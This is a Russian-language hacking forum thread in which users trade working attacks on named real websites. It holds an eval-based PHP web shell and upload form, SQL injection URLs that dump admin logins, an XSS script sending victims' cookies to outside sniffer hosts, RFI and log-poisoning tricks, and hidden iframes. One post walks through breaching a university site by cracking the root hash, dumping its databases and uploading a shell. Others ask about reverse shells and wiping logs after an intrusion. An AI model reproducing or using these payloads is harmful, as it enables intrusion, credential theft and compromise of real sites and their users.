что экранизируеться?
излагай проблему подробно, дабы тебе смогли помочь.

да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше

Если работает outfile, но файл не прочитать - может просто-напросто прав на чтение нет в этот каталог? О_о

Или то, что записывается - просто глюк.

записывается, но когда пытаюсь wso залить шел, ошибки
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
итд

записывается, но когда пытаюсь wso залить шел, ошибки
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
итд

Покажи запрос, которым заливаешь. Возможно, лишний слеш поставил.

да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше

тогда лей wso без html-вставок, последняя версия:

https://forum.antichat.ru/threadedpost1624918.html#post1624918

1. Заливаешь такой шелл:

<?eval(stripslashes($_GET[e]));?>

2. Проверяешь:


http://site.com/имя_твоего_шелла&e=phpinfo();


или


http://site.com/имя_твоего_шелла?e=phpinfo();


по разному бывает

3. У себя на компе такую локальную форму творишь (обзываешь .html):


<form action=http://site.com/имя_твоего_шелла&e=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/www/тут_полный_абсолютный_путь_ до_папки_с_правами_на_запис� �/shell.php
method=post enctype=multipart/form-data>
<input type=file name=file><br>
<input type=submit value=Загрузить><br>
</form>


4. Запускаешь и льешь wso, всё

SELECT 'код шелла' FROM `table` INTO OUTFILE 'путь'

Pashkela.
Спасибо, получилось

ERROR: UNION types double precision and character varying cannot be matched

БД: PostgreSql. Как проводить запросы в таком случае ?

ERROR: UNION types double precision and character varying cannot be matched

БД: PostgreSql. Как проводить запросы в таком случае ?
в PG в union надо соблюсти не только количество полей но и их типы

я cast() уже перепробовал.Какой конкретный запрос ?

1+union+select+table_name+from+information_schema. tables+limit+1+offset+1----

Вышла такая хня.В ascii переводить чтоли.

1;select+table_name::text::int+from+information_sc hema. tables

Привет!
Подскажите плз, почему не пашет РФИ?
script.php?bla=../../../etc/passwd
ВСЕ ОК, а рфи не провелица:

script.php?bla=ftp://login:pwd@host/shell.php

Помогите плз.

Привет!
Подскажите плз, почему не пашет РФИ?
script.php?bla=../../../etc/passwd
ВСЕ ОК, а рфи не провелица:

script.php?bla=ftp://login:pwd@host/shell.php

Помогите плз.
Тебе никто не даст точного ответа.
Слишком мало информации даешь.
Может быть несколько вариантов, почему не пашет:
1. отключен удаленный инклуд
2. невозможн рфи потому что в скрипте инклудится include("some_dir/".$bla)

Тебе никто не даст точного ответа.
Слишком мало информации даешь.
Может быть несколько вариантов, почему не пашет:
1. отключен удаленный инклуд
2. невозможн рфи потому что в скрипте инклудится include("some_dir/".$bla)
Или на http и ftp проверка.


Сообщение от -m0rgan-
Привет!
Подскажите плз, почему не пашет РФИ?
script.php?bla=../../../etc/passwd
ВСЕ ОК, а рфи не провелица:

script.php?bla=ftp://loginwd@host/shell.php

Помогите плз.


Пробуй через логи.

Что значит "Через логи" ?
Можна поподробнее?

Что значит "Через логи" ?
Можна поподробнее?
Это значит записать в лог об ошибках код на подобии <? phpinfo(); die(); ?> и проинклюдить файл.

погоди с выводами.
таблица "wp_users" имеет поле :
user_pass(по дефолту),если найденная тобой скуля работает с таблице пользователей =>подбирай колонку с паролем пользователя, а затем и сам пароль.
колонку с паролем:
profile.php?id=2+and+length(user_pass)>0
пароль:
id=2+and+ascii(substring(user_pass,1,1))>127
^Посимвольным перебором.
вот (http://forum.antichat.ru/thread19844.html) замечательная статья Grey'a - Работа с инъекциями в MySQL третьей версии.


Спасибо за ответ.
Статья и правда замечательная, вчера её прочитал. Из неё и понял, что моя скуля почти бесполезна :)
В запросе не используется таблица wp_users:
SELECT crnt.post_id FROM wp_post2cat crnt LEFT JOIN wp_post2cat as cat2 USING(post_id) WHERE cat2.category_id =15 or 3=substring(version(),1,1) -- f AND crnt.category_id = 16
LOAD_FILE('/etc/passwd') - работает, можно посимвольно читать.
Но LOAD_FILE('/ip/site/www/wp-config.php') - уже не работает. На сколько я понимаю, права на чтение для папки /ip/site/www/ стоят только для апача (.
Буду искать дальше

а как тут узнать количество столбцов
http://www.multirussia.ru/index.php?id=34'

а как тут узнать количество столбцов
http://www.multirussia.ru/index.php?id=34'
и снова 3 ий мускул ,без поддержки обьединения запросов посредством UNION ,+ при запросах типа SELECT,ни подзапросов

возможно ли провести инъекцию в этом случае:
"SELECT page_id,page_title FROM page WHERE page_id='{INJ}' ";
"SELECT column1,column2,column3,column4,column5,column6,co lumn7 FROM table_xz WHERE page_id='{INJ}' ORDER BY date desc, id desc ";
А почему же нет?

введ в поле "><script>alert(1)</script>

а в ответ


Сведения об исключении: System.Web.HttpRequestValidationException: Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><script>alert(1)</sc...").

Ошибка источника:

[Отсутствуют соответствующие исходные строки]


Исходный файл: c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temp orary ASP.NET Files\root\a09a8f10\84ab695f\App_Web_newstudent.as px.cdcab7d2.t8jq514u.0.cs Строка: 0

Трассировка стека:

[HttpRequestValidationException (0x80004005): Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><script>alert(1)</sc...").]
System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +8721914
System.Web.HttpRequest.ValidateNameValueCollection (NameValueCollection nvc, String collectionName) +111
System.Web.HttpRequest.get_Form() +129
System.Web.HttpRequest.get_HasForm() +8722023
System.Web.UI.Page.GetCollectionBasedOnMethod(Bool ean dontReturnNull) +97
System.Web.UI.Page.DeterminePostBackMode() +63
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +6785
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +242
System.Web.UI.Page.ProcessRequest() +80
System.Web.UI.Page.ProcessRequestWithNoAssert(Http Context context) +21
System.Web.UI.Page.ProcessRequest(HttpContext context) +49
ASP.newstudent_aspx.ProcessRequest(HttpContext context) in c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temp orary ASP.NET Files\root\a09a8f10\84ab695f\App_Web_newstudent.as px.cdcab7d2.t8jq514u.0.cs:0
System.Web.CallHandlerExecutionStep.System.Web.Htt pApplication.IExecutionStep.Execute() +181
System.Web.HttpApplication.ExecuteStep(IExecutionS tep step, Boolean& completedSynchronously) +75


Информация о версии: Платформа Microsoft .NET Framework, версия:2.0.50727.3603; ASP.NET, версия:2.0.50727.3082

че за?????

введ в поле "><script>alert(1)</script>

а в ответ


че за?????
Троль?
Сведения об исключении: System.Web.HttpRequestValidationException: Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><script>alert(1)</sc...").
Я в ужасе.

я не пойму нафиг что ругается на ошибку. причем тут фрамеворк

Krist_ALL, это похоже на ColdFusion

univd.edu.ua
Этот пост посвящается человеку под ником Strilo4ka.
Меня просто удивила такая рьяная настойчивость в поиске, и такая безнадежная по его мнению ситуация, в более чем простом деле.

а дальше вроде ниче сделать нельзя шел вроде залить нельзя или я че то не доганяю на _http://www.univd.edu.ua/

Есть SQL инъект, и первым делом смотрим версию БД MySQL, за это отвечает функция version().
Т.к. выводимые поля у нас 1, 2 и 3 значит выполняем запрос:
http://www.univd.edu.ua/document/index.php?id_doc=414+and+1=4+union+select+version( ),2,3,4,5+--+
На выводе мы получаем строку 5.0.67-log, а это значит, что в отличии от версий >= 4.x есть преимущество такое как БД information_schema и таблицы в ней tables и columns, по средствам которых можно получить полное представление о структуре БД. Самое, на мой взгляд, оптимальное решение, вывести структуры БД в виде таблица:колонка, это можно сделать обратившись к таблице columns и её колонкам table_name и column_name.
Запрос будет выглядеть следующем образом:
http://www.univd.edu.ua/document/index.php?id_doc=414+and+1=4+union+select+concat_w s(0x3a,table_name,column_name),2,3,4,5+from+inform ation_schema.columns+--+
Но так как скрипт выводит всего лишь одну строку из БД, то мы получаем имя таблицы CHARACTER_SETS и имя колонки CHARACTER_SET_NAME. Для того, что бы нам посмотреть все имена существующих таблиц и колонок, нам необходимо воспользоваться оператор LIMIT. Синтаксис оператора выгладит следующим образом: LIMIT 10, 1; Данное выражение вернет одну строку, начиная с десятой. А значит используя этот оператор наш запрос будет выглядеть следующим образом:
http://www.univd.edu.ua/document/index.php?id_doc=414+and+1=4+union+select+concat_w s(0x3a,table_name,column_name),2,3,4,5+from+inform ation_schema.columns+limit+200,1+--+
Т.е. мы вывели 200-ую строку таблицы columns, результат которой: wp_comments:comment_content
Проще говоря, нужно просто перебрать все записи таблицы columns с первой по последнюю, если не охота возится руками, есть специализированный софт, который делает это всё в автоматическом режиме.

Так же можно проверить права пользователя обратившись к БД mysql и таблице user. Чаще, доступ к этой таблице естественно закрыт, из-за безопасности пользователей. Но в нашем случае, это не так :) И мы смело можем посмотреть имя и пароль (в зашифрованном виде) пользователей БД MySQL. Пароль шифруется обычно алгоритмом либо mysql, либо mysql5. В нашем случае, пароль зашифрован именно алгоритмом mysql. Имя логин root (главного пользователя) и пароль (хеш которого мы подобрали на онлайн сервисе hashcracking.info), мы можешь уже что-нибудь сделать.
Попробуем найти непосредственно доступ к БД, через PhpMyAdmin, т.к. чаще всего (чаще всегда ;)) используется именно она. Попробуем просканировать сайт, на открытые директории через онлайн сервис security-digger.org.
Досадно :( но PhpMyAdmin сервис нам так и не показал.
В отчаянии, я посмотрел robots.txt, и к удивлению увидел Disallow: /dumper/, в которой дивным образом располагается Sypex Dumper Lite 1.0.8. Эта утилита для легкого и удобного бэкапа БД. Недолго думая вводим уже известный нам пароль пользователя root. Теперь мы имеем возможность сделать и скачать бэкап любой БД на этом сервере. Смотрим, что у нас есть:
information_schema
banner
deal
dlinux
dpforum
ecom
forum
foto
helur_danneo
human
hybrid
l2jdb
linux
linuxkhua
mysql
shop
site
swinger
test
tz
univd
wolf
Не найдя ничего интересного в базе univd и тем более не зная названия директории администраторской панели, я, немного подумав начинаю просматривать содержимое других БД.
И почему-то приглянулась мне почему-то база linuxkhua, а именно приглянулась своим оканчанием ua, т.е. понятно, что это национальный украинский домен :) Не долго подумав, вбиваю в гугле linuxkhua, и как результат получаю это:
Свободное ПО для свободных людей @ linux.kh.ua - Каталог сайтов ...
Опечатки: Ѻ Зз Ð , linuxkhua. SEO: Яндекс ТИЦ: 9100, Google PR: 0. Анализ сайта: Alexa traffic Старницы сайта linux.kh.ua в индексе Google.com ...
www.spravka.co.ua/10721-linux.kh.ua - Похожие
Ну и ясно стало, что сайт linux.kh.ua и база linuxkhua - это единое целое :eek:
Дальше, первым делом, смотрим robots.txt и узнаем название директории администраторской панели: linux.kh.ua/apanel/ Достаем из бэкапа что мы слили средствами Sypex Dumper, логин и пароль пользователя, заходим и видим вкладочку "Файл браузер" и жмем кнопочку "Залить шелл".
Заходим на шелл и попадаем на сервер, на котором хостится univd.edu.ua. Так как цель у нас была непосредственно только этот сайт, то прав на него нам хватает :)
/home/snake/univd/univd/ drwxrwxrwx

Если же нужны какие-то другие манипуляции, то и здесь все хорошо, т.к. ядро бажное:
uname -a: Linux web 2.6.15.6 #3 PREEMPT Thu May 25 16:08:10 EEST 2006 i686
Но к сожалению SSH порт закрыт :(

Но намеченная цель, достигнута. Уважаемый пользователь Strilo4ka, все действия указанные выше, не требуют никаких специфических знание, включаем логику и всё становится предельно ясным :) Успехов!

В этом посте я не указывал имена таблиц в которых лежат конфиденциальные данные, такие как логины и пароли, так же скрыл сами пароли. Но получить эти данные не составляют никаких проблем. Ссылки на шелл и сбрученные пароли, не высылаю. Все предельно просто. :)

возможно ли провести инъекцию в этом случае:
"SELECT page_id,page_title FROM page WHERE page_id='{INJ}' ";
"SELECT column1,column2,column3,column4,column5,column6,co lumn7 FROM table_xz WHERE page_id='{INJ}' ORDER BY date desc, id desc ";

А почему же нет?
тогда такой вопрос.. какой запрос надо сделать, чтобы удачно провести инъекцию?
update :
сперва глянул на локалхосте :
1) ?page_id=1+and+1=1
2) ?page_id=1+and+1=2 (ответ тот же что и в первом)
вот по этому так и решил.

хрен шо там проведешь
Почему же? Можно провести, если конечно нет фильтрации. Если не будет вывода, то можно создать условие, при котором подбирать символы посимвольно, и если символ соответствует нужному, то возвращать верное значение page_id, если не верное, то возвращать заведомо неверное значение.

если нет никаких "особых условий", то иньекция будет обычная, тоесть с нормальным выводом. Всё зависит от скрипта

Смотрите, есть табла админа с паролькой
http://www.ayda.ru/hotels/show_country.php?id=-11%20union%20select%201,2,3,login,5,psw,7,8,9,10,1 1,12,13,14,15,16,17%20FROM%20mkj_admin
есть админка http://www.ayda.ru/z_admin
Вопрос, почему я не могу попасть в админку?
блин, и так везде

Смотрите, есть табла админа с паролькой
http://www.ayda.ru/hotels/show_country.php?id=-11%20union%20select%201,2,3,login,5,psw,7,8,9,10,1 1,12,13,14,15,16,17%20FROM%20mkj_admin
есть админка http://www.ayda.ru/z_admin
Вопрос, почему я не могу попасть в админку?
блин, и так везде
Потому что у тебя на z_admin стоит бейсик авторизация.

eliteload

-1 union select 1,2/*
либо
-1 union select 1,2,3,4,5,6,7/*

Вывод не зависит запроса к базе. Вывод это скрипт, т.к. скрипта не вижу, не знаю где будет вывод.

Опять-же повторюсь. это если в скрипте нет никаких заморочек типо die() при нулевом результате выборки и т.д.

ну и я не понял, ты там ' ' для обрамления поставил, или они в коде есть, если в коде то
-1' union select 1,2/*
либо
-1' union select 1,2,3,4,5,6,7/*

"SELECT page_id,page_title FROM page WHERE page_id='{INJ} '";
сегодня тестил , у меня немного другой запрос ,но это сути не меняет:
$id=stripslashes($_GET['newsid']);
$news = mysql_query("select * from `news` where id ='$id'")
or die(mysql_error());
(в таблице `news` - 6 полей), думаю тут все понятно,+вклеил mysql_error(); послушать что мускул глаголит.
при манипулировании с разными вариантами запроса ,подошел :
?newsid=-1'+union+select+1,2,3,4,5,6/*
с комментарием /* , другие :
#,--, - не катят,голову сломал ,но хз почему (пробавал однострочный запрос , результат - тот же)
то есть так как описал jokester:
-1' union select 1,2/*
либо
-1' union select 1,2,3,4,5,6,7/*

L I G A
Всё это уже тестилось и обсуждалось, читайте маны, и не придётся по 100 раз одно и то-же пробовать :)
https://forum.antichat.ru/showpost.php?p=1047515&postcount=72
и пару постов вниз обсуждение

L I G A, весомую роль играет еще работа скрипта, потому-как неизвестно, что и как фильтруется, и как обработанный запрос к БД, обрабатывает сам скрипт.

Драсте
есть такая штука
http://www.foreignpolicy.org.ua/view2.php?id=28768
если ставлю кавычку то пишет "ОШИБКА: невозможно отобразить выбраную новость"
Если делаю вот так http://www.foreignpolicy.org.ua/view2.php?id=28769-1 то отобразицца моя новость.
Вот беру дальше http://www.foreignpolicy.org.ua/view2.php?id=28768+ORDER+BY+9 и уже узнаю что у меня 9 полей
Но почему вот такой запрос приводит к ошибке
http://www.foreignpolicy.org.ua/view2.php?id=28768+UNION+SELECT+1,2,3,4,5,6,7,8,9

Потому что тут PostgreSQL
http://www.foreignpolicy.org.ua/view2.php?id=-28768+union+select+null,version(),null,null,null,n ull,null,null,null--
PostgreSQL 8.2.13 on i386-portbld-freebsd6.3, compiled by GCC cc (GCC) 3.4.6 [FreeBSD] 20060305
PS Там даже у юзера права usesuper

Здраствуйте.
Нашол на одном форуме старый альбом.
http://forum.psihov.net.ua/store/album
Пробовал залить шелл через картинку, не получается.
Помогите пж,или подскажыте что можно зделать.

Здраствуйте.
Нашол на одном форуме старый альбом.
http://forum.psihov.net.ua/store/album
Пробовал залить шелл через картинку, не получается.
Помогите пж,или подскажыте что можно зделать.

C:\xampp\htdocs\forum\store\album\liders.php
Какой смысл ломать что-то стоящее на домашнем серве под виндой?

C:\xampp\htdocs\forum\store\album\liders.php
Какой смысл ломать что-то стоящее на домашнем серве под виндой?
Я учусь основ хакинга, для меня даже ето сломать большая робота.
Подскажыте что-то пожайлуста.

Ребят подскажите, есть такой сайт http://www.in-vest-group.ru/component/search/%252F?ordering=&searchphrase=all
на нем есть уязвимость xss, можно проверить в поле поиск, как дальше куки заполучить? что то не выходит...

вместо <script>alert()</script> пишеш <script>
img = new Image(); img.src = "http://ссылка_на_сниф.gif"+document.cookie;
</script>

Roston скажи а сниф гиф например какой?

<script>
img = new Image(); img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>

так пойдет? я вписываю это в адресную строку, но ошибка со стороны сервера.

ага понял тебя, только вот сниффер не писал не когда, мб есть какой нить готовый исходник?

ага понял тебя, только вот сниффер не писал не когда, мб есть какой нить готовый исходник?
А мб есть какой нибудь поисковик в интернете? Или поxуй?

ага понял тебя, только вот сниффер не писал не когда, мб есть какой нить готовый исходник?

Онлайн вариант по ссылке.

Link (http://hacker-pro.net/sniffer/)

Третий результат в гугле по запросу "Сниффер".

Учиться! Учиться! Учиться!

или же
kanicq.ru/sniffer

Ну что ж, спасибо кто помогал, теперь как я понимаю надо ждать результата в сниффере?

как проверить прошла атака или нет?

зайти на снифер,если есть куки значит прошла

HAXTA4OK куки ведь получаться сразу, или только когда админ сайта зайдет на сайт? просто пока что куков нет...

когда он зайдет на сайт, вернее на ту странице где xss сработает

ЗЫ возьми и сам проверь, зайди туда где ты xss прописывал , если придут твои куки значит xss там есть

HAXTA4OK, понял, вечером проверю логи сниффера, вдруг что нить получиться))

HAXTA4OK проверил ка4к ты сказал, не пришли, блин. можешь посмотреть что я не так сделал?

<script>
img = new Image(); img.src = "http://faiki.hut2.ru/s.gif"+document.cookie;
</script>

Вот такой код, в писываю в адрессную строку, в поле поиска появляется img new image();

прочел тему твою сначала, тьфу, у тебя пассивная а не активная, для этого тебе надо эту ссылку как то впарить админу что бы он по ней прошел, что мало вероятно

зы ощущение что ее там вообще нету =\

ребят, а еще есть какой нить способ по моему сайту?

На счет твоего сайта, могу сказать что он стоин на системе Joomla 1.5,если я не ошыбаюсь.

Можеш также брутом подобрать у админке
http://www.in-vest-group.ru/administrator/index.php

ПиСи
Я вообше удивляюсь где ты там увидел ксс.

Можно ли выполнить комманду, если:
Disable Functions: escapeshellarg,escapeshellcmd,dl,shell_exec,exec,s ystem,passthru,popen,pclose,proc_open,proc_nice,pr oc_close,proc_getstatus,pcntl_exec,link,symlink,ap ache_child_terminate,proc_terminate,posix_mkfifo,p osix_getuid,posix_geteuid, posix_getgid,ssh,ssh_exec,ssh2,set_time_limit, safe_mode,posix_setpgid,posix_getpwuid, posix_getgrgid,posix_kill,ssh2_exec,pcntl_exec, ini_restore,ioctl,highlight_file, show_source,ini_alter, leak,ssthru,get_current_user, openlog,settimelimit,apache_get_modules,apache_get _version, apache_setenv,proc_get_status,posix_setsid, posix_setuid, chgrp, getmyuid, posix_access, stream_set_blocking, stream_get_transports, pfsockopen,ini_set, iniset

Можно ли выполнить комманду, если:
Disable Functions: escapeshellarg,escapeshellcmd,dl,shell_exec,exec,s ystem,passthru,popen,pclose,proc_open,proc_nice,pr oc_close,proc_getstatus,pcntl_exec,link,symlink,ap ache_child_terminate,proc_terminate,posix_mkfifo,p osix_getuid,posix_geteuid, posix_getgid,ssh,ssh_exec,ssh2,set_time_limit, safe_mode,posix_setpgid,posix_getpwuid, posix_getgrgid,posix_kill,ssh2_exec,pcntl_exec, ini_restore,ioctl,highlight_file, show_source,ini_alter, leak,ssthru,get_current_user, openlog,settimelimit,apache_get_modules,apache_get _version, apache_setenv,proc_get_status,posix_setsid, posix_setuid, chgrp, getmyuid, posix_access, stream_set_blocking, stream_get_transports, pfsockopen,ini_set, iniset

можно, через SSI если в apache он включен (mod_include)

Можно что-то зделать через http://forum.psihov.net.ua/store/album альбом?
Например залить шелл?

Можно ли на сайт поставить какой ниить ифрейм, но чтобы его не было видно на сайте, прописался гденить в коде.. но траф шол... если можно, подскажите какие есть ...

а что тебе мешает дать нулевые параметры фрейму?или же по одному пикселю на высоту и ширину..и будет маленьких квадратик еле заметный

Можно ли на сайт поставить какой ниить ифрейм, но чтобы его не было видно на сайте, прописался гденить в коде.. но траф шол... если можно, подскажите какие есть ...
<iframe src="http://site.ru" style="display: none"></iframe>

благодарю..

Почему в sql-injection не работают конструкции into oufile и into dumpfile?
Выполняю
http://site.com/calendar.php?event_id=68199+union+select+1,LOAD_FI LE('/etc/passwd'),...,67
работает!

Выполняю
http://site.com/calendar.php?event_id=68199+union+select+1,2,...,6 7+into+outfile+'/tmp/1'
и пытаюсь прочитать
http://site.com/calendar.php?event_id=68199+union+select+1,LOAD_FI LE('/tmp/1'),...,67
- не пашет.
Неужели в /tmp нельзя писать!

прав на запись у юзера твоего нема

Rubaka, в смысле прав нем? у папки /tmp ведь права 777, т.е. доступна на запись всем.
Или юзеру, от которого выполняется запрос в mysql? Но ведь /etc/passwd читается, значит file_priv=y

Rubaka, в смысле прав нем? у папки /tmp ведь права 777, т.е. доступна на запись всем.
Или юзеру, от которого выполняется запрос в mysql? Но ведь /etc/passwd читается, значит file_priv=y
Возможно addslashes() - НЕТ.
попробуй
http://site.com/calendar.php?event_id=68199+union+select+1,LOAD_FI LE(0x2f746d702f31),...,67

Возможно файл уже существует, пробуй /tmp/rubaka

та сплошь и рядом файлы читаются а не записываються ((
mysql ному юзеру мож было выставлено шо низзя писать файлы

Ctacok, да я так и делаю, вместо '/etc/passwd' пишу 0x2f6574632f706173737764, там слэши экранируются.

Попробывал записать в /tmp/1_gr_1 - такого точно не должно быть, результат тот же.
А да, ещё когда посылаю запрос
http://site.com/calendar.php?event_id=68199+union+select+1,2,...,6 7+into+outfile+'/tmp/1_gr_1'
в ответ приходит
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /var/www/html/calendar/calendar.php on line 25

Rubaka, да ладно, как показывает моя личная практика - если можно прочитать, файл /etc/passwd, то и в /tmp писать тоже можно!

mysql ному юзеру мож было выставлено шо низзя писать файлы
Опять же где было выставлено? В таблице mysql.user или в правах у папки /tmp?

Ctacok, да я так и делаю, вместо '/etc/passwd' пишу 0x2f6574632f706173737764, там слэши экранируются.

Попробывал записать в /tmp/1_gr_1 - такого точно не должно быть, результат тот же.
А да, ещё когда посылаю запрос

в ответ приходит
Ну если слэшки экранируються то я думаю и ' тоже экранируються, а ошибка эта и будет при любой ошибке :)

Так ошибки не должно быть, в том то и дело. синтаксис верный.

_gr34t
http://site.com/calendar.php?event_id=-68199'+union+select+1,2,...,6 7+into...
?

Ctacok, да я так и делаю, вместо '/etc/passwd' пишу 0x2f6574632f706173737764, там слэши экранируются.

1 А как ты пишешь в файл, если там что-то экранируется?
2 Прочитай индекс файл, или любой файл с веба. Уверен, что база там-же где сайт?
та сплошь и рядом файлы читаются а не записываються ((
mysql ному юзеру мож было выставлено шо низзя писать файлы
Покажешь хоть один пример?

Пример

читаем /etc/hosts
http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+LOAD_FILE(0x2F6574632F686F737473 ),2

в исходнике смортим он есть

пишем <? phpinfo(); ?>

http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+0x3C3F20706870696E666F28293B203F 3E,2+FROM+mysql.user+INTO+DUMPFILE+'/tmp/12345'

читаем
/tmp/12345

http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+LOAD_FILE(0x2F746D702F3132333435 ),2

и ниче (

Rubaka
Там квотесы включены, с чего он запишется-то?

jokester
ну так файл же читается, и не записывается
как я и говорил

прав на запись у юзера твоего нема
та сплошь и рядом файлы читаются а не записываються ((
mysql ному юзеру мож было выставлено шо низзя писать файлы
вот что ты говорил.

Вот и покажи мне пример, где у юзера такие ПРАВА, что читать он может, а писать нет.
Кавычки тут никакого отношения к делу не имеют

jokester
да неправ я был ,ступил
везде где нет кавычек и права для чтения я в /tmp могу писать
сайтов 5-6 попробовал

подскажите есть ли здесь скуль иньекция
www.craigolsonsports.com/newsarticle.php?id=0809&nid=29546'

http://www.craigolsonsports.com/newsarticle.php?id=0809&nid=29546%20and%201=2%20union%20select%20user(),2+--+

1 А как ты пишешь в файл, если там что-то экранируется?
2 Прочитай индекс файл, или любой файл с веба. Уверен, что база там-же где сайт?


1. -deleted-

2. Уже читал, пароли к БД вытащил, только с других хостов не пускает (как и положено)


L I G A, Уже пробывал - всё равно не работает :(

Ошибку пишет
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /var/www/html/calendar/detailview.php on line 25

Да что за срань такая!

Ведь если файлы читаются, значит для пользователя установлен флаг file_priv=y, значит и писать можно! Всё, по-другому никак. Или я не прав?

А запрос может быть составлен так, чтобы конструкции into outfile и into dumpfile нельзя было использовать?

http://site.com/calendar.php?event_id=681+union+select+null,0x3c3f 70687020696e636c75646528245f4745545b67675f696e635d 293b3f3e,null,null,null+into+outfile+0x2f706174682 f746f2f6d792f7363726970742e706870
ну может потому и не пишется что ты путь в hex'е вписал))

ну может потому и не пишется что ты путь в hex'е вписал))
Блиа. :(
ILYAtirtir, спасибо что разморочил. )

Отвечаю, что где-то на ачате видел такое. В памяти отложилось вот и писал так. Оказывается так нельзя )

Тогда другой вопрос: можно как-нибудь обойти кавычки?

нет, только если есть двойной запрос в скуле

Можно ли получить куки поддомена (test.site.ru) если есть xss в основном домене(site.ru)?

Можно ли получить куки поддомена (test.site.ru) если есть xss в основном домене(site.ru)?
Нельзя.

как после удачной SQL inj. чистить логи?
версия MySQL 5.1.22-rc-log
где их искать?

Обычно:
/var/log/mysql

Разве их кто то логирует? чистить нужн access (http://forum.antichat.ru/thread49775.html) логи....а не мускульные.

Привет, наткнулся на сайт который на 80% написан на JS с использованием Аякса
Почитам код наткнулся на функцию которая добавляет юзера

function user_add2db()
{
if ((true) || (assertNotEmpty('adminUserAdd_login', 'Логин не может быть пустым!')
&& assertNotEmpty('adminUserAdd_password1', 'Пароль не может быть пустым!')
&& assertNotEmpty('adminUserAdd_name', 'Имя пользователя не может быть пустым!')
&& assertEqual('adminUserAdd_password1', 'adminUserAdd_password2', 'Пароль и его подтверждение не совпадают!')))
{
new Ajax.Updater('notify', siteGetUrl()+'core/user_add2db', {evalScripts: true,
parameters: {
id: -1,
login: $('adminUserAdd_login').value,
name: $('adminUserAdd_name').value,
password: $('adminUserAdd_password1').value,
email: $('adminUserAdd_email').value,
group: $('adminUserAdd_group').value,
description: $('adminUserAdd_descr').value } });
}
}

Обратился к site.ru/core/user_add2db не передав параметров
Notice: Undefined index: id in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 153

Notice: Undefined index: login in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 153

Notice: Undefined index: name in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 153

Notice: Undefined index: description in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 154

Notice: Undefined index: email in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 154

Notice: Undefined index: group in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 154

Notice: Undefined index: password in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 156

Fatal error: Call to a member function sid() on a non-object in /opt/htdocs/kid/site.ru/core/user.class.php on line 50

Вопрос в том как передать странице параметры (через GET не получается)

еслиб register_globals=On оно бы передалось в любом случае..а значит никак.

Значит так:
1. Есть шелл на сервере.
2. Есть NetCat у меня.
По всей видимости на сервере стоит антивирь, т.к. при бек-коннекте с помощью встроенной ф-ции в r57 ничего не происходит. Брал так же другой скрипт для бек-коннект - ничего... Как сделать бек-коннект?

Нашёл скул инъект.
на .php?mod=1' выдает обычную
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 1' at line 1
на .php?mod=1'union/**/select/**/1/* пустую страницу
на .php?mod=1'union/**/select/**/1,2, и т.д./* неверное количество полей
Это и есть слепая инъекция?Никогда раньше не работал с blind инъектами
Если да,то скажите пару слов про использование Bsqlbf или sqlmap

.php?mod=1'union/**/select/**/1/* пустую страницу

а ты не пропустил ничего?
.php?mod=1'/**/union/**/select/**/1/* пустую страницу

.php?mod=1'union/**/select/**/1/* пустую страницу

а ты не пропустил ничего?
.php?mod=1'/**/union/**/select/**/1/* пустую страницу

Разницы никакой,пробовал...

Нашёл скул инъект.
на .php?mod=1' выдает обычную
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 1' at line 1
на .php?mod=1'union/**/select/**/1/* пустую страницу
на .php?mod=1'union/**/select/**/1,2, и т.д./* неверное количество полей
Это и есть слепая инъекция?Никогда раньше не работал с blind инъектами
Если да,то скажите пару слов про использование Bsqlbf или sqlmap
Реальный пример можно? :) Хотя тут и по ошибке всё понятно...

Реальный пример можно? :) Хотя тут и по ошибке всё понятно...

http://apsite.ru/x/popup.php?mod=1'
P.S. а чё тут понятно? =)

p.r0phe.t
Я не понимаю, неужели нельзя сначала хоть что-то прочитать?
Что ты хочешь что-бы тебе тут ответили без линка и с такой информацией?

А вот так что выдаёт?
.php?mod=-1'/**/union/**/select/**/1/*
А вот так?
.php?mod=-1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/and/**/1=1--+
А вот так?
.php?mod=-1/**/and/**/1=2--+

Продолжаем гадание, или почитаешь что-то? А может мы увидем линк?

p.r0phe.t
Я не понимаю, неужели нельзя сначала хоть что-то прочитать?
Что ты хочешь что-бы тебе тут ответили без линка и с такой информацией?

А вот так что выдаёт?
.php?mod=-1'/**/union/**/select/**/1/*
А вот так?
.php?mod=-1/**/union/**/select/**/1/*
А вот так?
